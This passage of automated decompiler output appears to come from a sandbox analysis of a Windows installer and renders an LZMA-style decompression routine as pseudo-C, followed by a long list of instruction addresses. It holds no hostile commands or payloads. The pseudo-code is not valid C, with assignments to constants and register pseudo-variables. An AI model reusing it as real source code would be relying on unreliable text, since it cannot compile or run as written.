											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                        0x00000000
                                                        0x00406956
                                                        0x00406956
                                                        0x0040695b
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407013
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x00000000
                                                        0x004071c6
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00000000
                                                        0x00407035
                                                        0x0040695d
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00000000
                                                        0x00406b8e
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a1a
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406aca
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406aa3
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00000000
                                                        0x00406a11
                                                        0x00406a9d
                                                        0x004069a6
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
